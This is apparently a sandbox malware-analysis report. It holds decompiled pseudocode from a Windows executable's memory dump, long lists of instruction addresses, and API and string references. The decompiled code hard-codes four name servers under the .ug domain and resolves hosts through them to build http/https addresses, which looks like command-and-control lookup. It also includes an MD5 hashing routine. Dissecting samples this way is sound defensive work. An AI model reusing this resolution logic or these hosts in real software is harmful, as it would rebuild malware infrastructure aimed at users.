                                                                                    																	_t565 = _t565 + 0xc;
                                                                                    																}
                                                                                    															}
                                                                                    															 *((intOrPtr*)(_t444 + 0x10)) = _v60;
                                                                                    															 *(_t444 + 0x14) = _v56;
                                                                                    															_v56 = 0xf;
                                                                                    															_v60 = 0;
                                                                                    															_v76 = 0;
                                                                                    														}
                                                                                    														L116:
                                                                                    														_t444 = _t444 + 0x18;
                                                                                    														_v8 = 2;
                                                                                    														__eflags = _v56 - 0x10;
                                                                                    														_v28 = _t444;
                                                                                    														if(_v56 >= 0x10) {
                                                                                    															L00422587(_v76);
                                                                                    															_t565 = _t565 + 4;
                                                                                    														}
                                                                                    														goto L118;
                                                                                    													}
                                                                                    													_t511 = 0x2aaaaaab * (_t356 - _t444) >> 0x20 >> 2;
                                                                                    													__eflags = (_t511 >> 0x1f) + _t511 - 1;
                                                                                    													if((_t511 >> 0x1f) + _t511 >= 1) {
                                                                                    														goto L110;
                                                                                    													}
                                                                                    													__eflags = 0xaaaaaaa - _t534 - 1;
                                                                                    													if(__eflags < 0) {
                                                                                    														L129:
                                                                                    														_push("vector<T> too long");
                                                                                    														E0044F23E(__eflags);
                                                                                    														goto L130;
                                                                                    													}
                                                                                    													_t548 = _t534 + 1;
                                                                                    													_t471 = (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2);
                                                                                    													_t515 = _t471 >> 1;
                                                                                    													__eflags = 0xaaaaaaa - _t515 - _t471;
                                                                                    													if(0xaaaaaaa - _t515 >= _t471) {
                                                                                    														_t472 = _t471 + _t515;
                                                                                    														__eflags = _t472;
                                                                                    													} else {
                                                                                    														_t472 = 0;
                                                                                    													}
                                                                                    													__eflags = _t472 - _t548;
                                                                                    													_t473 =  <  ? _t548 : _t472;
                                                                                    													__eflags =  <  ? _t548 : _t472;
                                                                                    													E00416360(_t444,  &_v32, _t534, _t548,  <  ? _t548 : _t472);
                                                                                    													_t444 = _v28;
                                                                                    													_v48 = _v24;
                                                                                    													goto L110;
                                                                                    												}
                                                                                    												_t475 = _t355;
                                                                                    												_t379 = _v32;
                                                                                    												__eflags = _t379 - _t475;
                                                                                    												if(_t379 > _t475) {
                                                                                    													goto L103;
                                                                                    												}
                                                                                    												_t544 = (0x2aaaaaab * (_t475 - _t379) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t475 - _t379) >> 0x20 >> 2);
                                                                                    												_t518 = _v48;
                                                                                    												__eflags = _t444 - _t518;
                                                                                    												if(_t444 != _t518) {
                                                                                    													L97:
                                                                                    													_t551 = _v32 + (_t544 + _t544 * 2) * 8;
                                                                                    													__eflags = _t444;
                                                                                    													if(_t444 != 0) {
                                                                                    														 *(_t444 + 0x14) = 0xf;
                                                                                    														 *((intOrPtr*)(_t444 + 0x10)) = 0;
                                                                                    														 *_t444 = 0;
                                                                                    														__eflags =  *(_t551 + 0x14) - 0x10;
                                                                                    														if( *(_t551 + 0x14) >= 0x10) {
                                                                                    															 *_t444 =  *_t551;
                                                                                    															 *_t551 = 0;
                                                                                    														} else {
                                                                                    															_t387 =  *((intOrPtr*)(_t551 + 0x10)) + 1;
                                                                                    															__eflags = _t387;
                                                                                    															if(_t387 != 0) {
                                                                                    																E004205A0(_t444, _t551, _t387);
                                                                                    																_t565 = _t565 + 0xc;
                                                                                    															}
                                                                                    														}
                                                                                    														 *((intOrPtr*)(_t444 + 0x10)) =  *((intOrPtr*)(_t551 + 0x10));
                                                                                    														 *(_t444 + 0x14) =  *(_t551 + 0x14);
                                                                                    														 *(_t551 + 0x14) = 0xf;
                                                                                    														 *((intOrPtr*)(_t551 + 0x10)) = 0;
                                                                                    														 *_t551 = 0;
                                                                                    													}
                                                                                    													goto L116;
                                                                                    												}
                                                                                    												_t520 = 0x2aaaaaab * (_t518 - _t444) >> 0x20 >> 2;
                                                                                    												__eflags = (_t520 >> 0x1f) + _t520 - 1;
                                                                                    												if((_t520 >> 0x1f) + _t520 >= 1) {
                                                                                    													goto L97;
                                                                                    												}
                                                                                    												__eflags = 0xaaaaaaa - _t534 - 1;
                                                                                    												if(__eflags < 0) {
                                                                                    													goto L129;
                                                                                    												}
                                                                                    												_t538 = _t534 + 1;
                                                                                    												_t484 = (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v48 - _v32) >> 0x20 >> 2);
                                                                                    												_t524 = _t484 >> 1;
                                                                                    												__eflags = 0xaaaaaaa - _t524 - _t484;
                                                                                    												if(0xaaaaaaa - _t524 >= _t484) {
                                                                                    													_t485 = _t484 + _t524;
                                                                                    													__eflags = _t485;
                                                                                    												} else {
                                                                                    													_t485 = 0;
                                                                                    												}
                                                                                    												__eflags = _t485 - _t538;
                                                                                    												_t486 =  <  ? _t538 : _t485;
                                                                                    												E00416360(_t444,  &_v32, _t538, _t544,  <  ? _t538 : _t485);
                                                                                    												_t444 = _v28;
                                                                                    												_v48 = _v24;
                                                                                    												goto L97;
                                                                                    											}
                                                                                    											_t463 = 0;
                                                                                    											goto L88;
                                                                                    										}
                                                                                    										_t402 =  *_t544;
                                                                                    										_t526 = _v32 + 0x10;
                                                                                    										__eflags = _t526;
                                                                                    										_v18 = _t402;
                                                                                    										_v132 = _t526;
                                                                                    										do {
                                                                                    											__eflags = _t402;
                                                                                    											if(_t402 != 0) {
                                                                                    												_t539 = _t544;
                                                                                    												_t141 = _t539 + 1; // 0x1
                                                                                    												_t488 = _t141;
                                                                                    												do {
                                                                                    													_t403 =  *_t539;
                                                                                    													_t539 = _t539 + 1;
                                                                                    													__eflags = _t403;
                                                                                    												} while (_t403 != 0);
                                                                                    												_t540 = _t539 - _t488;
                                                                                    												__eflags = _t540;
                                                                                    												L54:
                                                                                    												__eflags =  *((intOrPtr*)(_t526 + 4)) - 0x10;
                                                                                    												_t445 =  *_t526;
                                                                                    												if( *((intOrPtr*)(_t526 + 4)) < 0x10) {
                                                                                    													_t527 = _t526 + 0xfffffff0;
                                                                                    													__eflags = _t527;
                                                                                    												} else {
                                                                                    													_t527 =  *(_t526 - 0x10);
                                                                                    												}
                                                                                    												__eflags = _t445 - _t540;
                                                                                    												_t405 =  <  ? _t445 : _t540;
                                                                                    												__eflags = _t405;
                                                                                    												if(_t405 == 0) {
                                                                                    													L73:
                                                                                    													__eflags = _t445 - _t540;
                                                                                    													if(_t445 >= _t540) {
                                                                                    														__eflags = _t445 - _t540;
                                                                                    														_t151 = _t445 != _t540;
                                                                                    														__eflags = _t151;
                                                                                    														_t407 = 0 | _t151;
                                                                                    													} else {
                                                                                    														_t407 = _t405 | 0xffffffff;
                                                                                    													}
                                                                                    													__eflags = _t407;
                                                                                    													goto L77;
                                                                                    												} else {
                                                                                    													_t409 = _t405 - 4;
                                                                                    													__eflags = _t409;
                                                                                    													if(_t409 < 0) {
                                                                                    														L62:
                                                                                    														__eflags = _t409 - 0xfffffffc;
                                                                                    														if(_t409 == 0xfffffffc) {
                                                                                    															L71:
                                                                                    															_t407 = 0;
                                                                                    															__eflags = 0;
                                                                                    															L72:
                                                                                    															__eflags = _t407;
                                                                                    															if(__eflags != 0) {
                                                                                    																L77:
                                                                                    																_t534 = _v140;
                                                                                    																if(__eflags != 0) {
                                                                                    																	_t444 = _v28;
                                                                                    																	_t351 = 1;
                                                                                    																	_t544 = _v52;
                                                                                    																	goto L81;
                                                                                    																}
                                                                                    																goto L78;
                                                                                    															}
                                                                                    															goto L73;
                                                                                    														}
                                                                                    														L63:
                                                                                    														__eflags =  *_t527 -  *_t544;
                                                                                    														if( *_t527 !=  *_t544) {
                                                                                    															L70:
                                                                                    															asm("sbb eax, eax");
                                                                                    															_t407 = _t409 | 0x00000001;
                                                                                    															goto L72;
                                                                                    														}
                                                                                    														__eflags = _t409 - 0xfffffffd;
                                                                                    														if(_t409 == 0xfffffffd) {
                                                                                    															goto L71;
                                                                                    														}
                                                                                    														__eflags =  *((intOrPtr*)(_t527 + 1)) -  *((intOrPtr*)(_t544 + 1));
                                                                                    														if( *((intOrPtr*)(_t527 + 1)) !=  *((intOrPtr*)(_t544 + 1))) {
                                                                                    															goto L70;
                                                                                    														}
                                                                                    														__eflags = _t409 - 0xfffffffe;
                                                                                    														if(_t409 == 0xfffffffe) {
                                                                                    															goto L71;
                                                                                    														}
                                                                                    														__eflags =  *((intOrPtr*)(_t527 + 2)) -  *((intOrPtr*)(_t544 + 2));
                                                                                    														if( *((intOrPtr*)(_t527 + 2)) !=  *((intOrPtr*)(_t544 + 2))) {
                                                                                    															goto L70;
                                                                                    														}
                                                                                    														__eflags = _t409 - 0xffffffff;
                                                                                    														if(_t409 == 0xffffffff) {
                                                                                    															goto L71;
                                                                                    														}
                                                                                    														_t409 =  *((intOrPtr*)(_t527 + 3));
                                                                                    														__eflags = _t409 -  *((intOrPtr*)(_t544 + 3));
                                                                                    														if(_t409 ==  *((intOrPtr*)(_t544 + 3))) {
                                                                                    															goto L71;
                                                                                    														}
                                                                                    														goto L70;
                                                                                    													}
                                                                                    													while(1) {
                                                                                    														__eflags =  *_t527 -  *_t544;
                                                                                    														if( *_t527 !=  *_t544) {
                                                                                    															goto L63;
                                                                                    														}
                                                                                    														_t527 = _t527 + 4;
                                                                                    														_t544 = _t544 + 4;
                                                                                    														_t409 = _t409 - 4;
                                                                                    														__eflags = _t409;
                                                                                    														if(_t409 >= 0) {
                                                                                    															continue;
                                                                                    														}
                                                                                    														goto L62;
                                                                                    													}
                                                                                    													goto L63;
                                                                                    												}
                                                                                    											}
                                                                                    											_t540 = 0;
                                                                                    											goto L54;
                                                                                    											L78:
                                                                                    											_t553 = _v120 + 1;
                                                                                    											_t402 = _v18;
                                                                                    											_t526 = _v132 + 0x18;
                                                                                    											_v120 = _t553;
                                                                                    											__eflags = _t553 - _t534;
                                                                                    											_t544 = _v52;
                                                                                    											_v132 = _t526;
                                                                                    										} while (_t553 < _t534);
                                                                                    										_t444 = _v28;
                                                                                    										goto L80;
                                                                                    										L118:
                                                                                    										_t347 =  *_v112;
                                                                                    										_v112 = _t347;
                                                                                    										__eflags = _t347;
                                                                                    									} while (_t347 != 0);
                                                                                    								}
                                                                                    								_t459 = _v116 + 1;
                                                                                    								_t344 = _v124 + 0x18;
                                                                                    								_v116 = _t459;
                                                                                    								_v124 = _t344;
                                                                                    								__eflags = _t459 - _v108;
                                                                                    							} while (_t459 < _v108);
                                                                                    							_t544 = _v52;
                                                                                    							_t534 = _v40;
                                                                                    							goto L121;
                                                                                    						}
                                                                                    						__eflags = _t555 - _t305;
                                                                                    						if(_t555 > _t305) {
                                                                                    							goto L29;
                                                                                    						}
                                                                                    						_t496 = _v40;
                                                                                    						_t558 = (0x2aaaaaab * (_t305 - _t555) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t305 - _t555) >> 0x20 >> 2);
                                                                                    						__eflags = _t496 - _t533;
                                                                                    						if(_t496 == _t533) {
                                                                                    							E00415230(_t437,  &_v44, _t533, _t496);
                                                                                    							_t533 = _v36;
                                                                                    							_t496 = _v40;
                                                                                    						}
                                                                                    						_t305 = _t558 + _t558 * 2;
                                                                                    						_t559 = _v44 + _t305 * 8;
                                                                                    						__eflags = _t496;
                                                                                    						if(_t496 != 0) {
                                                                                    							 *(_t496 + 0x14) = 0xf;
                                                                                    							 *((intOrPtr*)(_t496 + 0x10)) = 0;
                                                                                    							 *_t496 = 0;
                                                                                    							__eflags =  *(_t559 + 0x14) - 0x10;
                                                                                    							if( *(_t559 + 0x14) >= 0x10) {
                                                                                    								 *_t496 =  *_t559;
                                                                                    								 *_t559 = 0;
                                                                                    							} else {
                                                                                    								_t425 =  *((intOrPtr*)(_t559 + 0x10)) + 1;
                                                                                    								__eflags = _t425;
                                                                                    								if(_t425 != 0) {
                                                                                    									E004205A0(_t496, _t559, _t425);
                                                                                    									_t496 = _v40;
                                                                                    									_t564 = _t564 + 0xc;
                                                                                    								}
                                                                                    							}
                                                                                    							 *((intOrPtr*)(_t496 + 0x10)) =  *((intOrPtr*)(_t559 + 0x10));
                                                                                    							_t305 =  *(_t559 + 0x14);
                                                                                    							 *(_t496 + 0x14) = _t305;
                                                                                    							 *(_t559 + 0x14) = 0xf;
                                                                                    							 *((intOrPtr*)(_t559 + 0x10)) = 0;
                                                                                    							 *_t559 = 0;
                                                                                    						}
                                                                                    						goto L37;
                                                                                    						L17:
                                                                                    						_t412 =  *_t493;
                                                                                    						_t493 = _t493 + 1;
                                                                                    						__eflags = _t412;
                                                                                    						if(_t412 != 0) {
                                                                                    							goto L17;
                                                                                    						} else {
                                                                                    							_t494 = _t493 - _t554;
                                                                                    							__eflags = _t494;
                                                                                    							_t555 = _v44;
                                                                                    							goto L19;
                                                                                    						}
                                                                                    					}
                                                                                    					_t447 = _a24;
                                                                                    					_t502 = _a4;
                                                                                    					_t430 =  >=  ? _t502 :  &_a4;
                                                                                    					if(( >=  ? _t502 :  &_a4)[_t542] == 0x2f) {
                                                                                    						__eflags = 0;
                                                                                    						 *((short*)(_t560 + _t542 * 2 - 0xa0a8)) = 0;
                                                                                    						break;
                                                                                    					} else {
                                                                                    						_t433 =  >=  ? _t502 :  &_a4;
                                                                                    						 *((short*)(_t560 + _t542 * 2 - 0xa0a8)) = ( >=  ? _t502 :  &_a4)[_t542];
                                                                                    						_t542 = _t542 + 1;
                                                                                    						continue;
                                                                                    					}
                                                                                    				}
                                                                                    				_t533 = 0;
                                                                                    				_v44 = 0;
                                                                                    				_v40 = 0;
                                                                                    				_v36 = 0;
                                                                                    				_t305 = 0;
                                                                                    				_v32 = 0;
                                                                                    				_v28 = 0;
                                                                                    				_v48 = 0;
                                                                                    				_v24 = 0;
                                                                                    				_v8 = 2;
                                                                                    				_t437 = 0;
                                                                                    				__eflags = 0;
                                                                                    				_v160 = "ns1.kriston.ug";
                                                                                    				_v156 = "ns2.chalekin.ug";
                                                                                    				_v152 = "ns3.unalelath.ug";
                                                                                    				_v148 = "ns4.andromath.ug";
                                                                                    				goto L11;
                                                                                    			}
                                                                                    0x0040e5be
                                                                                    0x0040e5c1
                                                                                    0x0040e5c3
                                                                                    0x0040e604
                                                                                    0x0040e604
                                                                                    0x0040e607
                                                                                    0x0040e609
                                                                                    0x0040e642
                                                                                    0x0040e642
                                                                                    0x0040e646
                                                                                    0x0040e64b
                                                                                    0x0040e650
                                                                                    0x0040e65e
                                                                                    0x0040e669
                                                                                    0x0040e669
                                                                                    0x0040e60b
                                                                                    0x0040e60d
                                                                                    0x0040e60f
                                                                                    0x0040e639
                                                                                    0x0040e63a
                                                                                    0x0040e63f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040e611
                                                                                    0x0040e611
                                                                                    0x0040e611
                                                                                    0x0040e615
                                                                                    0x0040e619
                                                                                    0x0040e61e
                                                                                    0x0040e61e
                                                                                    0x0040e621
                                                                                    0x0040e628
                                                                                    0x0040e62f
                                                                                    0x0040e632
                                                                                    0x0040e635
                                                                                    0x0040e635
                                                                                    0x00000000
                                                                                    0x0040e611
                                                                                    0x0040e5c5
                                                                                    0x0040e5c8
                                                                                    0x0040e5ca
                                                                                    0x0040e5cc
                                                                                    0x0040e5fb
                                                                                    0x0040e5fc
                                                                                    0x0040e601
                                                                                    0x00000000
                                                                                    0x0040e601
                                                                                    0x0040e5d0
                                                                                    0x0040e5d0
                                                                                    0x0040e5d4
                                                                                    0x0040e5d8
                                                                                    0x0040e5dd
                                                                                    0x0040e5dd
                                                                                    0x0040e5e0
                                                                                    0x0040e5e7
                                                                                    0x0040e5ee
                                                                                    0x0040e5f1
                                                                                    0x0040e5f4
                                                                                    0x0040e5f4
                                                                                    0x0040e5f8
                                                                                    0x00000000
                                                                                    0x0040e5f8
                                                                                    0x0040e592
                                                                                    0x00000000
                                                                                    0x0040e592
                                                                                    0x0040e4d8
                                                                                    0x0040e0b3
                                                                                    0x0040e0b5
                                                                                    0x0040e0b8
                                                                                    0x0040e0b8
                                                                                    0x0040e0bc
                                                                                    0x0040e0be
                                                                                    0x0040e0be
                                                                                    0x0040e0c1
                                                                                    0x0040e0c7
                                                                                    0x0040e0cc
                                                                                    0x0040e0de
                                                                                    0x0040e0e5
                                                                                    0x0040e0eb
                                                                                    0x0040e0ee
                                                                                    0x0040e0f1
                                                                                    0x0040e0f3
                                                                                    0x0040e0f9
                                                                                    0x0040e100
                                                                                    0x0040e103
                                                                                    0x0040e109
                                                                                    0x0040e10b
                                                                                    0x0040e111
                                                                                    0x0040e11e
                                                                                    0x0040e12d
                                                                                    0x0040e12d
                                                                                    0x0040e12f
                                                                                    0x0040e135
                                                                                    0x0040e220
                                                                                    0x0040e220
                                                                                    0x0040e223
                                                                                    0x0040e223
                                                                                    0x0040e225
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040e22b
                                                                                    0x0040e232
                                                                                    0x0040e239
                                                                                    0x0040e23c
                                                                                    0x0040e23e
                                                                                    0x0040e24e
                                                                                    0x0040e250
                                                                                    0x0040e250
                                                                                    0x0040e253
                                                                                    0x0040e253
                                                                                    0x0040e255
                                                                                    0x0040e256
                                                                                    0x0040e256
                                                                                    0x0040e25a
                                                                                    0x0040e25a
                                                                                    0x0040e25c
                                                                                    0x0040e25c
                                                                                    0x0040e261
                                                                                    0x0040e266
                                                                                    0x0040e269
                                                                                    0x0040e26d
                                                                                    0x0040e26f
                                                                                    0x0040e371
                                                                                    0x0040e371
                                                                                    0x0040e374
                                                                                    0x0040e376
                                                                                    0x0040e3e8
                                                                                    0x0040e3e8
                                                                                    0x0040e3ea
                                                                                    0x0040e3ec
                                                                                    0x0040e3f3
                                                                                    0x0040e3fa
                                                                                    0x0040e3fd
                                                                                    0x0040e401
                                                                                    0x0040e41c
                                                                                    0x0040e41e
                                                                                    0x0040e403
                                                                                    0x0040e406
                                                                                    0x0040e406
                                                                                    0x0040e407
                                                                                    0x0040e40f
                                                                                    0x0040e414
                                                                                    0x0040e414
                                                                                    0x0040e407
                                                                                    0x0040e428
                                                                                    0x0040e42e
                                                                                    0x0040e431
                                                                                    0x0040e438
                                                                                    0x0040e43f
                                                                                    0x0040e43f
                                                                                    0x0040e443
                                                                                    0x0040e443
                                                                                    0x0040e446
                                                                                    0x0040e44a
                                                                                    0x0040e44e
                                                                                    0x0040e451
                                                                                    0x0040e456
                                                                                    0x0040e45b
                                                                                    0x0040e45b
                                                                                    0x00000000
                                                                                    0x0040e451
                                                                                    0x0040e383
                                                                                    0x0040e38d
                                                                                    0x0040e390
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040e399
                                                                                    0x0040e39c
                                                                                    0x0040e54d
                                                                                    0x0040e54d
                                                                                    0x0040e552
                                                                                    0x00000000
                                                                                    0x0040e552
                                                                                    0x0040e3a5
                                                                                    0x0040e3bf
                                                                                    0x0040e3c3
                                                                                    0x0040e3c7
                                                                                    0x0040e3c9
                                                                                    0x0040e3cf
                                                                                    0x0040e3cf
                                                                                    0x0040e3cb
                                                                                    0x0040e3cb
                                                                                    0x0040e3cb
                                                                                    0x0040e3d1
                                                                                    0x0040e3d3
                                                                                    0x0040e3d3
                                                                                    0x0040e3da
                                                                                    0x0040e3e2
                                                                                    0x0040e3e5
                                                                                    0x00000000
                                                                                    0x0040e3e5
                                                                                    0x0040e275
                                                                                    0x0040e277
                                                                                    0x0040e27a
                                                                                    0x0040e27c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040e293
                                                                                    0x0040e295
                                                                                    0x0040e298
                                                                                    0x0040e29a
                                                                                    0x0040e30a
                                                                                    0x0040e310
                                                                                    0x0040e313
                                                                                    0x0040e315
                                                                                    0x0040e31b
                                                                                    0x0040e322
                                                                                    0x0040e329
                                                                                    0x0040e32c
                                                                                    0x0040e330
                                                                                    0x0040e347
                                                                                    0x0040e349
                                                                                    0x0040e332
                                                                                    0x0040e335
                                                                                    0x0040e335
                                                                                    0x0040e336
                                                                                    0x0040e33b
                                                                                    0x0040e340
                                                                                    0x0040e340
                                                                                    0x0040e336
                                                                                    0x0040e352
                                                                                    0x0040e358
                                                                                    0x0040e35b
                                                                                    0x0040e362
                                                                                    0x0040e369
                                                                                    0x0040e369
                                                                                    0x00000000
                                                                                    0x0040e315
                                                                                    0x0040e2a7
                                                                                    0x0040e2b1
                                                                                    0x0040e2b4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040e2bd
                                                                                    0x0040e2c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040e2d1
                                                                                    0x0040e2e1
                                                                                    0x0040e2e5
                                                                                    0x0040e2e9
                                                                                    0x0040e2eb
                                                                                    0x0040e2f1
                                                                                    0x0040e2f1
                                                                                    0x0040e2ed
                                                                                    0x0040e2ed
                                                                                    0x0040e2ed
                                                                                    0x0040e2f3
                                                                                    0x0040e2f5
                                                                                    0x0040e2fc
                                                                                    0x0040e304
                                                                                    0x0040e307
                                                                                    0x00000000
                                                                                    0x0040e307
                                                                                    0x0040e240
                                                                                    0x00000000
                                                                                    0x0040e240
                                                                                    0x0040e13e
                                                                                    0x0040e140
                                                                                    0x0040e140
                                                                                    0x0040e143
                                                                                    0x0040e146
                                                                                    0x0040e150
                                                                                    0x0040e150
                                                                                    0x0040e152
                                                                                    0x0040e158
                                                                                    0x0040e15a
                                                                                    0x0040e15a
                                                                                    0x0040e160
                                                                                    0x0040e160
                                                                                    0x0040e162
                                                                                    0x0040e163
                                                                                    0x0040e163
                                                                                    0x0040e167
                                                                                    0x0040e167
                                                                                    0x0040e169
                                                                                    0x0040e169
                                                                                    0x0040e16d
                                                                                    0x0040e16f
                                                                                    0x0040e176
                                                                                    0x0040e176
                                                                                    0x0040e171
                                                                                    0x0040e171
                                                                                    0x0040e171
                                                                                    0x0040e179
                                                                                    0x0040e17d
                                                                                    0x0040e180
                                                                                    0x0040e182
                                                                                    0x0040e1e0
                                                                                    0x0040e1e0
                                                                                    0x0040e1e2
                                                                                    APIs
                                                                                    • _wcsstr.LIBCMT ref: 0040DD8D
                                                                                    • _wcsstr.LIBCMT ref: 0040DDB6
                                                                                    • _memset.LIBCMT ref: 0040DDE4
                                                                                    • lstrlenW.KERNEL32(?), ref: 0040DE0A
                                                                                    • gethostbyname.WS2_32(00500134), ref: 0040DEA7
                                                                                    • inet_ntoa.WS2_32(?), ref: 0040DEC7
                                                                                      • Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F27F
                                                                                      • Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                      • Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                      • Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                      • Part of subcall function 0044F26C: std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                      • Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                      • Part of subcall function 0044F26C: std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                      • Part of subcall function 0044F26C: __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                    • _memmove.LIBCMT ref: 0040DF8C
                                                                                    • _memmove.LIBCMT ref: 0040DFFC
                                                                                    • _wcsstr.LIBCMT ref: 0040E06C
                                                                                    • LocalAlloc.KERNEL32(00000040,00000008), ref: 0040E07E
                                                                                    • inet_addr.WS2_32(?), ref: 0040E0C1
                                                                                    • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 0040E0E5
                                                                                    • inet_ntoa.WS2_32(?), ref: 0040E103
                                                                                    • _memmove.LIBCMT ref: 0040E33B
                                                                                    • _memmove.LIBCMT ref: 0040E40F
                                                                                    • LocalFree.KERNEL32(?), ref: 0040E495
                                                                                    • DnsFree.DNSAPI(?,00000001), ref: 0040E4A0
                                                                                    • _memset.LIBCMT ref: 0040E4BC
                                                                                    • lstrcpyW.KERNEL32 ref: 0040E4D0
                                                                                    • lstrcatW.KERNEL32(?,00000000), ref: 0040E523
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0040E549
                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0040E56A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                    • String ID: http://$https://$invalid string position$ns1.kriston.ug$ns2.chalekin.ug$ns3.unalelath.ug$ns4.andromath.ug$vector<T> too long
                                                                                    • API String ID: 2428799424-3661121819
                                                                                    • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                    • Instruction ID: d0e64e8ea33e45a7fb560775d2837a96188487c5265d8965212a1f6c8b2ea466
                                                                                    • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                    • Instruction Fuzzy Hash: AA52E071A002199FCF24CFA9C880BAEBBF1BF44304F14897EE805AB381D7799955CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 62%
                                                                                    			E00410FC0(CHAR* __ecx, CHAR** __edx) {
                                                                                    				int _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _v24;
                                                                                    				int _v28;
                                                                                    				long* _v32;
                                                                                    				int _v36;
                                                                                    				char _v40;
                                                                                    				char _v44;
                                                                                    				int _v48;
                                                                                    				char _v52;
                                                                                    				char _v56;
                                                                                    				char _v68;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				long** _t40;
                                                                                    				int* _t41;
                                                                                    				int _t42;
                                                                                    				char _t44;
                                                                                    				char _t50;
                                                                                    				void* _t72;
                                                                                    				CHAR** _t73;
                                                                                    				void* _t80;
                                                                                    				int _t81;
                                                                                    				void* _t83;
                                                                                    				CHAR* _t84;
                                                                                    				intOrPtr* _t85;
                                                                                    				void* _t87;
                                                                                    				intOrPtr _t89;
                                                                                    				intOrPtr _t90;
                                                                                    				void* _t92;
                                                                                    				void* _t93;
                                                                                    
                                                                                    				_t79 = __edx;
                                                                                    				 *[fs:0x0] = _t89;
                                                                                    				_t90 = _t89 - 0x34;
                                                                                    				_v20 = _t90;
                                                                                    				_t40 =  &_v32;
                                                                                    				_t73 = __edx;
                                                                                    				_v32 = 0;
                                                                                    				_t84 = __ecx;
                                                                                    				_v28 = 0;
                                                                                    				_v36 = 0;
                                                                                    				_v8 = 0;
                                                                                    				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff);
                                                                                    				if(_t40 == 0) {
                                                                                    					_v40 = _t40;
                                                                                    					E00430ECA( &_v40, 0x5085b8);
                                                                                    				}
                                                                                    				_t41 =  &_v28;
                                                                                    				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
                                                                                    				if(_t41 == 0) {
                                                                                    					_v44 = _t41;
                                                                                    					E00430ECA( &_v44, 0x5085b8);
                                                                                    				}
                                                                                    				_t42 = lstrlenA(_t84);
                                                                                    				__imp__CryptHashData(_v28, _t84, _t42, 0);
                                                                                    				if(_t42 == 0) {
                                                                                    					_v48 = _t42;
                                                                                    					E00430ECA( &_v48, 0x5085b8);
                                                                                    				}
                                                                                    				_t85 = __imp__CryptGetHashParam;
                                                                                    				_v24 = 0;
                                                                                    				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
                                                                                    				_t98 = _t44;
                                                                                    				if(_t44 == 0) {
                                                                                    					_v52 = _t44;
                                                                                    					E00430ECA( &_v52, 0x5085b8);
                                                                                    				}
                                                                                    				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
                                                                                    				_v36 = _t81;
                                                                                    				E0042B420(_t81, 0, _v24 + 1);
                                                                                    				_t92 = _t90 + 0x10;
                                                                                    				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
                                                                                    				if(_t50 == 0) {
                                                                                    					_v56 = _t50;
                                                                                    					E00430ECA( &_v56, 0x5085b8);
                                                                                    				}
                                                                                    				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
                                                                                    				E0042B420(_t52, 0, 0x14 + _v24 * 2);
                                                                                    				_t87 = 0;
                                                                                    				_t93 = _t92 + 0x10;
                                                                                    				if(_v24 > 0) {
                                                                                    					do {
                                                                                    						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
                                                                                    						_t93 = _t93 + 0xc;
                                                                                    						lstrcatA( *_t73,  &_v68);
                                                                                    						_t87 = _t87 + 1;
                                                                                    					} while (_t87 < _v24);
                                                                                    				}
                                                                                    				E00422110(_t81);
                                                                                    				__imp__CryptDestroyHash(_v28);
                                                                                    				CryptReleaseContext(_v32, 0);
                                                                                    				 *[fs:0x0] = _v16;
                                                                                    				return 1;
                                                                                    			}




































                                                                                    APIs
                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
